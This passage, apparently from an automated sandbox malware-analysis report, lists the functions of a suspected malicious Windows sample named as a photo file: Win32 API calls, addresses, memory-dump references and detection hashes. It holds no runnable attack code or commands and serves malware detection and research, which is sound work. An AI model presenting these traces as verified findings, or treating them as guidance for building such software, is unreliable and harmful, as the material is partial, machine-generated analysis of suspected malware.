                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$_wcslen$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 2081771294-1403004172
                                                                      • Opcode ID: c5a31b8f144580b59bae3a8ace3e731821db552c41fce7d6a37be6c1c2c0ae8d
                                                                      • Instruction ID: f34409113e18c8a987bb1585c5641049093c3c6770498d58ef4c26391d63fbe8
                                                                      • Opcode Fuzzy Hash: c5a31b8f144580b59bae3a8ace3e731821db552c41fce7d6a37be6c1c2c0ae8d
                                                                      • Instruction Fuzzy Hash: B9210775A00204BEDB14ABA4D845CFF7B79DF56360F14821AF85A972E0EF34894A9670
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00DA2EC0
                                                                      • LoadLibraryW.KERNEL32(?), ref: 00DA2EC7
                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00DA2EDC
                                                                      • DestroyWindow.USER32(?), ref: 00DA2EE4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                      • String ID: SysAnimate32
                                                                      • API String ID: 3529120543-1011021900
                                                                      • Opcode ID: 19ab03a9f2087bede17c2c087d40a8b3756c9b4ff8cab4cf9b08241c05a127e1
                                                                      • Instruction ID: 46197f6c6da258646120468ac4f05d53af0a42a0c9e85778935f4e4c11f3f5f0
                                                                      • Opcode Fuzzy Hash: 19ab03a9f2087bede17c2c087d40a8b3756c9b4ff8cab4cf9b08241c05a127e1
                                                                      • Instruction Fuzzy Hash: 9A216A71210206BFEB109F6AEC84EBB37A9FB5A364F145218FA50D62A0D731DD91A770
                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D34CAE,00000003,?,00D34C4E,00000003,00DD88C8,0000000C,00D34DA5,00000003,00000002), ref: 00D34D1D
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D34D30
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00D34CAE,00000003,?,00D34C4E,00000003,00DD88C8,0000000C,00D34DA5,00000003,00000002,00000000), ref: 00D34D53
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 92eed61c5df8c15cf93f493c1af5cc3227cd860384bc683eaf1f55a7730b4496
                                                                      • Instruction ID: ce5b39161d229cc08e71a0a4568974a641a74aace9bffc82de6fb260863948c6
                                                                      • Opcode Fuzzy Hash: 92eed61c5df8c15cf93f493c1af5cc3227cd860384bc683eaf1f55a7730b4496
                                                                      • Instruction Fuzzy Hash: A6F04F34A10308BFDB119FA0EC09BAEBFB4EF44761F0440A4F806E6260CF759A40CAB0
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32 ref: 00D6DB49
                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00D6DB5B
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00D6DB81
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                                      • API String ID: 145871493-2590602151
                                                                      • Opcode ID: 38eeb46bd856d74a4654475c2d3a4f71f17505b2aaf8c09bedc527e7fcc9ade4
                                                                      • Instruction ID: 9f41c508e583f214697af92923f69c95bd25ff7b0b4b3df14eb75a2f7109b836
                                                                      • Opcode Fuzzy Hash: 38eeb46bd856d74a4654475c2d3a4f71f17505b2aaf8c09bedc527e7fcc9ade4
                                                                      • Instruction Fuzzy Hash: E4F02230F5A7319FD7629B24AC589A93236AF21B04F1940A9F842E3254EB70CD84CAB4
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D1687F,?,PO,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D1683E
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D16850
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00D1687F,?,PO,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D16862
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 145871493-3689287502
                                                                      • Opcode ID: 2590edc2036c7460bb75d1cedeeecd367bfd6c8497a3bea88016d1ecd2c956ff
                                                                      • Instruction ID: 561f21f364ee8ec862c3fddda2a34ae8e095e2a39689050bf375a0b942a3064f
                                                                      • Opcode Fuzzy Hash: 2590edc2036c7460bb75d1cedeeecd367bfd6c8497a3bea88016d1ecd2c956ff
                                                                      • Instruction Fuzzy Hash: BDE0CD727117212B92111B157C08B9F6654DF83B33B090025FD05D2350DF60CD4680B5
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D5488B,?,PO,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D16804
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D16816
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00D5488B,?,PO,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D16829
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 145871493-1355242751
                                                                      • Opcode ID: 584792ad38588abedf2ac188d1339ac8d8177bf0d95be43b7b59edc9ffc36932
                                                                      • Instruction ID: 8c038c0e1eeb2ca354bdd9a1632743561c757c96b52577541a03e8de685422f5
                                                                      • Opcode Fuzzy Hash: 584792ad38588abedf2ac188d1339ac8d8177bf0d95be43b7b59edc9ffc36932
                                                                      • Instruction Fuzzy Hash: 0DD012316527216B52221F29BC189CF7E54DE87B313090129F801E2254DF21CD46C5F4
                                                                      APIs
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D82B23
                                                                      • DeleteFileW.KERNEL32(?), ref: 00D82BA5
                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00D82BBB
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D82BCC
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D82BDE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: File$Delete$Copy
                                                                      • String ID:
                                                                      • API String ID: 3226157194-0
                                                                      • Opcode ID: 9bf65da6d6aa36cef9c0b9e750d378351426026eed7856a4d5598452c7fe570e
                                                                      • Instruction ID: b595d73dfabba4c3178651c087c2cfbb63a31de5e4e40e74ab9568b4bdc5d3d3
                                                                      • Opcode Fuzzy Hash: 9bf65da6d6aa36cef9c0b9e750d378351426026eed7856a4d5598452c7fe570e
                                                                      • Instruction Fuzzy Hash: 27B14E71901219ABDF25EFA4CC85EEEBBBDEF49310F1440A6F509E6145EA30AA44CF70
                                                                      APIs
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00D9A34E
                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00D9A35C
                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00D9A38F
                                                                      • CloseHandle.KERNEL32(?), ref: 00D9A564
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 3488606520-0
                                                                      • Opcode ID: 893e17449621282142028fecf8c06b44183aa35507e457e2a86f864a1730a7ce
                                                                      • Instruction ID: 6b8172cf93961665944018b420a380a9ebbc064d5655cf9b0f1a5f4e8fa7685f
                                                                      • Opcode Fuzzy Hash: 893e17449621282142028fecf8c06b44183aa35507e457e2a86f864a1730a7ce
                                                                      • Instruction Fuzzy Hash: C8A1A271604301AFDB20DF18D886B6AB7E1EF94714F14881CF9599B392DBB0ED418BB2
                                                                      APIs
                                                                        • Part of subcall function 00D7DCFE: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D7CE40,?), ref: 00D7DD1B
                                                                        • Part of subcall function 00D7DCFE: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D7CE40,?), ref: 00D7DD34
                                                                        • Part of subcall function 00D7E0B7: GetFileAttributesW.KERNEL32(?,00D7CEB3), ref: 00D7E0B8
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00D7E391
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00D7E3CA
                                                                      • _wcslen.LIBCMT ref: 00D7E509
                                                                      • _wcslen.LIBCMT ref: 00D7E521
                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00D7E56E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3183298772-0
                                                                      • Opcode ID: 7554b7f91f8109c8632d4bbd74764d9d9374fdbdaae593d6fa83ae11f3fae66b
                                                                      • Instruction ID: 221832b8d97b8d7dab96946d889dd9bd50ccdb624ed5fd33498be98dfa325945
                                                                      • Opcode Fuzzy Hash: 7554b7f91f8109c8632d4bbd74764d9d9374fdbdaae593d6fa83ae11f3fae66b
                                                                      • Instruction Fuzzy Hash: ED516EB24083859BC724EB94D8819DBB3ECEF89310F04492EF589D7151FF71A6888B76
                                                                      APIs
                                                                        • Part of subcall function 00D1B606: _wcslen.LIBCMT ref: 00D1B610
                                                                        • Part of subcall function 00D9C8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D9B5D5,?,?), ref: 00D9C8DC
                                                                        • Part of subcall function 00D9C8BF: _wcslen.LIBCMT ref: 00D9C918
                                                                        • Part of subcall function 00D9C8BF: _wcslen.LIBCMT ref: 00D9C98F
                                                                        • Part of subcall function 00D9C8BF: _wcslen.LIBCMT ref: 00D9C9C5
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D9B9CC
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D9BA27
                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00D9BA8A
                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00D9BACD
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D9BADA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                      • String ID:
                                                                      • API String ID: 826366716-0
                                                                      • Opcode ID: 7009bb6d9332b65436c168dbc15a0575d615e0e7f3804d7be2a5e8ce5f40a83e
                                                                      • Instruction ID: 03a749dc9cb27322194cc61f9f937a7eedeccc7fa00c1dee2e748fecbaf9f9cc
                                                                      • Opcode Fuzzy Hash: 7009bb6d9332b65436c168dbc15a0575d615e0e7f3804d7be2a5e8ce5f40a83e
                                                                      • Instruction Fuzzy Hash: CB61D031218241EFC714DF14D580E6ABBE5FF84328F19855EF0998B2A2DB71ED45CBA2
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00D78B23
                                                                      • VariantClear.OLEAUT32 ref: 00D78B94
                                                                      • VariantClear.OLEAUT32 ref: 00D78BF3
                                                                      • VariantClear.OLEAUT32(?), ref: 00D78C66
                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00D78C91
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                      • String ID:
                                                                      • API String ID: 4136290138-0
                                                                      • Opcode ID: 5657644aacc2415c8653ab3b50473909ffab1b42fd7c396c1712412a0a257c25
                                                                      • Instruction ID: c6747e797f1f67a7ed08573095a41282f7b09fb746b3086074f067ebeb9087f9
                                                                      • Opcode Fuzzy Hash: 5657644aacc2415c8653ab3b50473909ffab1b42fd7c396c1712412a0a257c25
                                                                      • Instruction Fuzzy Hash: C8514CB5A10619DFCB14CF68C894AAAB7F4FF8D314F158569E949DB310E730E911CBA0
                                                                      APIs
                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00D88ACC
                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00D88AF8
                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00D88B50
                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00D88B75
                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00D88B7D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                      • String ID:
                                                                      • API String ID: 2832842796-0
                                                                      • Opcode ID: ad25ef69b4bd59e309f78bccca15c1e9eae3a5582858c1361a693f80f638dbc4
                                                                      • Instruction ID: 92b3d460a876d8ffc0616c9eed74ce8c10e7eb096f989532e823a5b65790026f
                                                                      • Opcode Fuzzy Hash: ad25ef69b4bd59e309f78bccca15c1e9eae3a5582858c1361a693f80f638dbc4
                                                                      • Instruction Fuzzy Hash: 30514C75A00214EFCB15EF55D881AA9BBF5FF49314F088058E949AB362CB31FC41DBA0
                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00D98E67
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00D98EF7
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00D98F13
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00D98F59
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00D98F79
                                                                        • Part of subcall function 00D2F7A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00D80F61,?,753CE610), ref: 00D2F7C5
                                                                        • Part of subcall function 00D2F7A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00D6F94D,00000000,00000000,?,?,00D80F61,?,753CE610,?,00D6F94D), ref: 00D2F7EC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                      • String ID:
                                                                      • API String ID: 666041331-0
                                                                      • Opcode ID: 96afe879f6ffd50738a0dbace899e2f505f57625088c57e51608f179699eae34
                                                                      • Instruction ID: 0ca9f80271adc134bbf65d18522c33c54a9d6df632c80b9b545d82439a832d1a
                                                                      • Opcode Fuzzy Hash: 96afe879f6ffd50738a0dbace899e2f505f57625088c57e51608f179699eae34
                                                                      • Instruction Fuzzy Hash: 20514B35A00205EFCB01DF58D494C99BBF1FF4A724B0990A9F8199B362DB31ED85DBA1
                                                                      APIs
                                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00DA6B01
                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00DA6B18
                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00DA6B41
                                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00D8AA97,00000000,00000000), ref: 00DA6B66
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00DA6B95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$MessageSendShow
                                                                      • String ID:
                                                                      • API String ID: 3688381893-0
                                                                      • Opcode ID: 0580a2456476638add52a400b76d4221bc8110d88acf7346dfb9ebdb641993b6
                                                                      • Instruction ID: ac5bf99d08b797085bf25fe901298dfcdb879236ec97e2caf6d7fee397d37ccf
                                                                      • Opcode Fuzzy Hash: 0580a2456476638add52a400b76d4221bc8110d88acf7346dfb9ebdb641993b6
                                                                      • Instruction Fuzzy Hash: B7417B39A00214EFDB259F68CC58FA97BA5EB0B360F1D4224F959E72A1C771ED41CA70
                                                                      APIs
                                                                      • GetInputState.USER32 ref: 00D837E9
                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00D83840
                                                                      • TranslateMessage.USER32(?), ref: 00D83869
                                                                      • DispatchMessageW.USER32(?), ref: 00D83873
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D83884
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                      • String ID:
                                                                      • API String ID: 2256411358-0
                                                                      • Opcode ID: de82b6e1ea68da3efc6c56b99a62e66147e8c7b85719b9a7b20ee67dd20bb196
                                                                      • Instruction ID: fb5c66fc9de03a023f59ad24816c6b465faf594f1e5b5813988c766ba624fcf7
